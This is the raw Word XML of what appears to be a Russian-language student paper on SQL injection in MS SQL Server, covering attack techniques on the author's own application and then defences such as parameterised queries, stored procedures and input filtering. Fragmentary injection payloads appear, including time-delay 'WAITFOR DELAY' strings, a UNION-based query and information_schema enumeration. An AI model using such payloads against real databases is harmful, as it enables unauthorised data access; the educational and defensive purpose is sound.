          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> определяем имена всех остальных колонок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.  Пример</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w: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Pr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data_base_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00354B8E">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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">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ELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00BD26D7"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lastRenderedPageBreak/>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EE02CA" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name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 xml:space="preserve">ELAY '00:00:10'-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRPr="00BD26D7" w:rsidRDefault="00BD26D7"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BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc420429533"/>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="8"/>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BD26D7" w:rsidRPr="009F0170" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc420789647"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Применение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-кода на собственном приложении</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRDefault="00BD26D7"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546FBD" w:rsidRDefault="00546FBD" w:rsidP="00165AA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10"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1"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8F0DAD" w:rsidRDefault="00546FBD" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>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2"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3"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">все </w:t>
      </w:r>
      <w:r w:rsidR="00A852C0" w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>имена таблиц</w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> созданных</w:t>
      </w:r>
      <w:r w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">and '1' = '2' </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Union  </w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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8B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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4"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5"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165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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следухим</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165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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Это легко можно сделать зная имя файла и расположение. Для этого необходимо воспользоваться оператором bulk insert</w:t>
      </w:r>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9F0170" w:rsidRDefault="00D11F44" w:rsidP="00D11F44">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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3"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A852C0" w:rsidRDefault="00A852C0" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc420429534"/>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p w:rsidR="004936B0" w:rsidRDefault="004936B0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRPr="004936B0" w:rsidRDefault="00A852C0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc420789648"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Способы предотвращения</w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql-инъекций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00800878" w:rsidRDefault="008F0DAD" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc420429536"/>
      <w:bookmarkStart w:id="13" w:name="_Toc420789649"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1) Использование параметризованных команд</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00B97D9A"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B97D9A">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B97D9A">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B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00B97D9A"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B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00B97D9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Customers</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00B97D9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WHERE</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomerID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00B97D9A">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8F0DAD" w:rsidRPr="003B32C2"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3B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * FROM Customers WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomerID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Синтаксис параметризованных команд у различных поставщиков выглядит немного по-разному. В поставщике SQL Server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Parameter для каждого параметра, который вставляется в коллекцию Command.Parameters.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Server, поскольку соответствие между параметрами и заполнителями задается с помощью имен.</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sql. В любом случае, используя параметризованные команды, ни один вредоносный скрипт,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cmd.Parameters.AddWithValue("@CustID", id);</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46706C" w:rsidRPr="009F0170" w:rsidRDefault="0046706C" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc420429537"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00800878" w:rsidRDefault="008F0DAD" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc420789650"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2) Использование хранимых процедур</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>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позволяют реализовать более безопасное обращение с базой данных. Например, вы можете позволить учетной записи Windows,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 SQL Server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r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w: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6" w:name="_Toc420429538"/>
      <w:bookmarkStart w:id="17" w:name="_Toc420789651"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3)Проверка всех данных, вводимых пользователем</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>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Практический все приложения или сайты, работающие с СУБД, обрабатывают данные, приходящие от клиенты на сервер. Эти данные могут находиться в url странице, поле для ввода информации, теле post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4) Никогда не создавайте инструкции Transact-SQL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w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>через пользовательский интерфейс, и далее во всех последующих точках пересечения границ доверенной зоны.</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8) По возможности отклоняйте вводимые данные, содержащие следующие </w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>символы</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> запросов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b)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c)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d) Разделители комментариев. Текст, заключенный между символами /* и */, не обрабатывается сервером - /* ... */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670F38" w:rsidRDefault="00670F38" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc420429539"/>
      <w:bookmarkStart w:id="19" w:name="_Toc326105875"/>
      <w:bookmarkStart w:id="20" w:name="_Toc418778187"/>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bookmarkEnd w:id="18"/>
    <w:p w:rsidR="003B32C2" w:rsidRPr="009F0170" w:rsidRDefault="003B32C2" w:rsidP="003B32C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:p w:rsidR="004936B0" w:rsidRDefault="00670F38" w:rsidP="00020A8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w: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020A8D" w:rsidRPr="00D21A0A" w:rsidRDefault="00020A8D" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc420429540"/>
      <w:bookmarkStart w:id="22" w:name="_Toc420789652"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="005678D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A02D75"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rPr>
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection: https://technet.microsoft.com/. -URL: https://technet.microsoft.com/ru-ru/library/ms161953(v=sql.105).aspx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Написание защищенного динамического SQL-кода в SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
